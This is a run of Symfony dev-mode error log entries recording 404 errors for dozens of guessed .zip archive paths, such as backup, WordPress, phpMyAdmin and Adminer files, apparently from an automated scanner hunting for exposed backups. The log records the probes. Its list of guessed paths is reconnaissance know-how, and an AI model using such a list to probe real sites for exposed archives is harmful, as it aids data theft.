  3575. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3576. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3577. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3578. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3579. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3580. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3581. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3582. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3583. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3584. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3585. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3586. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3587. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3588. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3589. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3590. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3591. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3592. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /svn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /svn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3593. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3594. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3595. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3596. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3597. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /devtools.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /devtools.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3598. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3599. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /beta.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /beta.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3600. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /protected.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /protected.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3601. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3602. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3603. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3604. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /local.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /local.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3605. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpmyadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpmyadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3606. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manager.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manager.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3607. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3608. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3609. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /libraries.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /libraries.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3610. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /localhost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /localhost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3611. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3612. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bower_components.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bower_components.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3613. [2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /host.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /host.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3614. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /adminer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /adminer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3615. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /opt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /opt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3616. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oauth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oauth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3617. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
